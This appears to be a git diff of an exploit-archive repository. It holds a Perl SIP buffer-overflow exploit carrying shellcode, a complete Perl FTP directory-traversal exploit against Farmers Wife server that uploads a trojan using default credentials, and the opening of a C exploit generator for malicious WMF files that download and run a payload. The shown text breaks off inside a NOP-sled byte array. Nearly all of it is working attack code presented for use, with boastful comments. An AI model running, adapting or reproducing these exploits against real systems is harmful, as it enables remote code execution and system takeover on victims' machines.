+"\xa9\x76\x45\xac\x1e\x28\x6b\xd1\xba\xf3\x2f\xc3\x5e\xfa\xb9\x5f".
+"\xe0\x34\xdd\x3b\x81\x06\xd9\x85\xf8\x26\xd3\xf7\x64\x8f\x5d\x81".
+"\x70\x8b\xf7\x1c\xd9\x01\xdb\x59\xe0\xf9\xb6\x87\x4c\x53\x86\x51".
+"\x3a\x02\x0c\xea\x41\x2d\xa5\x5c\x4c\x31\x7d\x5d\x83\x37\x42\x58".
+"\xe3\x56\xd2\x48\xe3\x46\xd2\xf7\xe6\x2a\x0b\xcf\x82\xdd\xd1\x5b".
+"\xdb\x04\x82\x1b\x77\x8f\x62\x62\xa3\x56\xd5\xf7\xe6\x22\xd1\x5f".
+"\x4c\x53\xaa\x5b\xe7\x51\x7d\x5d\x93\x8f\x45\x60\xf0\x4b\xc6\x08".
+"\x3a\xe5\x05\xf2\x82\xc6\x0f\x74\x97\xaa\xe8\x1d\xea\xf5\x29\x8f".
+"\x49\x85\x6e\x5c\x75\x42\xa6\x18\xf7\x60\x45\x4c\x97\x3a\x83\x09".
+"\x3a\x7a\xa6\x40\x3a\x7a\xa6\x44\x3a\x7a\xa6\x58\x3e\x42\xa6\x18".
+"\xe7\x56\xd3\x59\xe2\x47\xd3\x41\xe2\x57\xd1\x59\x4c\x73\x82\x60".
+"\xc1\xf8\x31\x1e\x4c\x53\x86\xf7\x63\x8f\x64\xf7\xc6\x06\xea\xa5".
+"\x6a\x03\x4c\xf7\xe6\x02\x0b\xcb\xd9\xf9\x7d\x3e\x4c\xd5\x7d\x7d".
+"\xb3\x6e\x6d\xc6\x53\x66\x7d\x5d\xb7\x37\x59\x5b\x4c\xd6\x82";
+
+my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;
+
+my $sipinvite =
+
+"INVITE sip:snotboble\@solgryn.fi.st SIP/2.0\r\n".
+"Via: SIP/2.0/UDP abcdabcd.fi.st:1234;branch=somebranchidhere\r\n".
+"From: 2448 ;tag=2448\r\n".
+"To: Receiver \r\n".
+"Call-ID: 0\@abcdabcd.fi.st\r\n".
+"CSeq: 1 INVITE\r\n".
+"Contact: 2448 \r\n".
+"Expires: 1200\r\n".
+"Max-Forwards: 70\r\n".
+"Content-Type: application/sdp\r\n".
+"Content-Length: 4234\r\n".
+"\r\n".
+$buffer .
+"=0\r\n".
+"o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.st\r\n".
+"s=Session SDP\r\n".
+"c=IN IP4 123.123.12.34\r\n".
+"t=0 0\r\n".
+"m=audio 9876 RTP/AVP 0\r\n".
+"a=rtpmap:0 PCMU/8000\r\n".
+"\r\n";
+$host = $ARGV[0];
+$port = 5060;
+
+$socket = new IO::Socket::INET
+(
+Proto => "udp",
+PeerAddr => $host,
+PeerPort => $port,
+);
+
+die "unable to connect to $host:$port ($!)\n" unless $socket;
+
+print $socket $sipinvite;
+
+close($socket);
+
+# milw0rm.com [2006-01-12]
diff --git a/platforms/windows/remote/1417.pl b/platforms/windows/remote/1417.pl
index 6577200f2..bbc901509 100755
--- a/platforms/windows/remote/1417.pl
+++ b/platforms/windows/remote/1417.pl
@@ -1,56 +1,56 @@
-#!/usr/bin/perl
-# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to
-# use ../../../ patterns as long as we stand in a folder where we have write access.
-# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.
-# default port is 22003, default writable path is /guests.
-
-# 0day 0day, private, distribute and die bla bla bla
-# leet (translated) note from : you can log in as IEUser/mail@mail.com or anonymous/mail@mail.com
-# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous
-# login gives you guest access, which means write access to /guests, which means default remote 'root'
-# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.
-
-
-if(!$ARGV[0]){ die "Usage: ./thisscript.pl [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";}
-# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt
-# by default we just put /etc/hosts in a file called owned.txt in the root of the drive -
-# nuke %SYSTEMROOT%\system32\at.exe and wait for windows to run it.
-
-# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper
-# location for our trojan.
-
-use Net::FTP;
-my $target = $ARGV[0];
-my $dotdot = "../../../../../../../../../../../../../../";
-# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM
-if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";}
-if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";}
-if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";}
-if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";}
-if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";}
-if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";}
-print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n";
-
-# Open the command socket
-use Net::FTP;
-$ftp = Net::FTP->new("$target",
- Debug => 0,
- Port => "$port")
- or die "Cannot connect: $@";
- $ftp->login("$user","$pass")
- or die "Cannot login ", $ftp->message;
- $ftp->cwd("$writablepath")
- # this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.
- or die "Cannot go to writable dir ", $ftp->message;
- # leet %SYSTEMROOT% scan by determining where at.exe is using SIZE
- my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE");
- for(@systemroots){
- $reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe");
- if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; }
- }
- $ftp->binary;
- $ftp->put("$trojan","$dotdot"."$destination")
- and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message;
-$ftp->quit;
-
-# milw0rm.com [2006-01-14]
+#!/usr/bin/perl
+# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to
+# use ../../../ patterns as long as we stand in a folder where we have write access.
+# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.
+# default port is 22003, default writable path is /guests.
+
+# 0day 0day, private, distribute and die bla bla bla
+# leet (translated) note from : you can log in as IEUser/mail@mail.com or anonymous/mail@mail.com
+# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous
+# login gives you guest access, which means write access to /guests, which means default remote 'root'
+# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.
+
+
+if(!$ARGV[0]){ die "Usage: ./thisscript.pl [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";}
+# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt
+# by default we just put /etc/hosts in a file called owned.txt in the root of the drive -
+# nuke %SYSTEMROOT%\system32\at.exe and wait for windows to run it.
+
+# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper
+# location for our trojan.
+
+use Net::FTP;
+my $target = $ARGV[0];
+my $dotdot = "../../../../../../../../../../../../../../";
+# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM
+if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";}
+if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";}
+if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";}
+if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";}
+if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";}
+if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";}
+print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n";
+
+# Open the command socket
+use Net::FTP;
+$ftp = Net::FTP->new("$target",
+ Debug => 0,
+ Port => "$port")
+ or die "Cannot connect: $@";
+ $ftp->login("$user","$pass")
+ or die "Cannot login ", $ftp->message;
+ $ftp->cwd("$writablepath")
+ # this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.
+ or die "Cannot go to writable dir ", $ftp->message;
+ # leet %SYSTEMROOT% scan by determining where at.exe is using SIZE
+ my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE");
+ for(@systemroots){
+ $reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe");
+ if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; }
+ }
+ $ftp->binary;
+ $ftp->put("$trojan","$dotdot"."$destination")
+ and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message;
+$ftp->quit;
+
+# milw0rm.com [2006-01-14]
diff --git a/platforms/windows/remote/1420.c b/platforms/windows/remote/1420.c
index 38ee0a76e..b529cb4b9 100755
--- a/platforms/windows/remote/1420.c
+++ b/platforms/windows/remote/1420.c
@@ -1,1399 +1,1399 @@
-/*
-\
-/ WMF nDay download() Exploit Generator
-\ by Unl0ck Research Team
-/
-\
-/ greetz:
- rst/ghc { ed, uf0, fost },
- uKt { choix, nekd0, payhash, antq },
- blacksecurity { #black } ,
- 0x557 { kaka, swan, sam, nolife },
- sowhat, tty64 { izik };
-
- This sploit is now full shit, so...
- kiddies party has been started!!!
-
-urs,
-darkeagle
-\
-/
-*/
-
-#include
-#include
-
-#pragma comment(lib, "ws2_32")
-
-// Use for find the ASM code
-#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\
- __asm _emit 0x90 __asm _emit 0x90\
- __asm _emit 0x90 __asm _emit 0x90\
- __asm _emit 0x90 __asm _emit 0x90
-#define PROC_END PROC_BEGIN
-#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-#define SEARCH_LEN 8
-#define MAX_SC_LEN 2048
-#define HASH_KEY 13
-
-// Define Decode Parameter
-#define DECODE_LEN 21
-#define SC_LEN_OFFSET 7
-#define ENC_KEY_OFFSET 11
-#define ENC_KEY 0xff
-
-
-// Define Function Addr
-#define ADDR_LoadLibraryA [esi]
-#define ADDR_GetSystemDirectoryA [esi+4]
-#define ADDR_WinExec [esi+8]
-#define ADDR_ExitProcess [esi+12]
-#define ADDR_URLDownloadToFileA [esi+16]
-
-// Need functions
-unsigned char functions[100][128] =
-{ // [esi] stack layout
- // kernel32 4 // 00 kernel32.dll
- {"LoadLibraryA"}, // [esi]
- {"GetSystemDirectoryA"}, // [esi+4]
- {"WinExec"}, // [esi+8]
- {"ExitProcess"}, // [esi+12]
- // urlmon 1 // 01 urlmon.dll
- {"URLDownloadToFileA"}, // [esi+16]
- {""},
-};
-
-
-
-unsigned char head1[512] = {
- 0x01, 0x00, 0x09, 0x00, 0x00, 0x03, 0x52, 0x1F, 0x00, 0x00, 0x06, 0x00, 0x3D, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x18, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
- 0xFF, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x85, 0x00,
- 0xD0, 0x02, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF,
- 0xFF, 0xFF, 0x02, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x23, 0x00,
- 0xFF, 0xFF, 0xFF,
0xFF, 0x04, 0x00, 0x1B, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x14, 0x00, 0x20, 0x00, - 0xB8, 0x00, 0x32, 0x06, 0x00, 0x00, 0xFF, 0xFF, 0x4F, 0x00, 0x14, 0x00, 0x00, 0x00, 0x4D, 0x00, - 0x69, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x0A, 0x00, 0x54, 0x4E, - 0x50, 0x50, 0x00, 0x00, 0x02, 0x00, 0xF4, 0x03, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, - 0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x03, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x26, 0x06, - 0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0B, 0x02, 0x00, 0x00, - 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0C, 0x02, 0xD0, 0x02, 0xC0, 0x03, 0x04, 0x00, 0x00, 0x00, - 0x04, 0x01, 0x0D, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00, - 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02, - 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, - 0x1D, 0x06, 0x21, 0x00, 0xF0, 0x00, 0xD0, 0x02, 0xC0, 0x03, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0xFF, 0xFF, - 0xFF, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, - 0xF0, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x10, 0x00, - 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x16, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x47, 0x00, - 0x00, 0x00, 0x8F, 0x02, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0xC1, 0x02, 0x00, 0x00, 0x08, 0x00, - 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x06, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x0D, 0x00, - 0x00, 0x00, 0xFB, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x01, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, - 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0x00, 0x00, 0x00, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, - 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00, - 0x26, 0x06, 0x09, 0x00, 0x16, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 -}; - -unsigned char head2[15220] = { - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 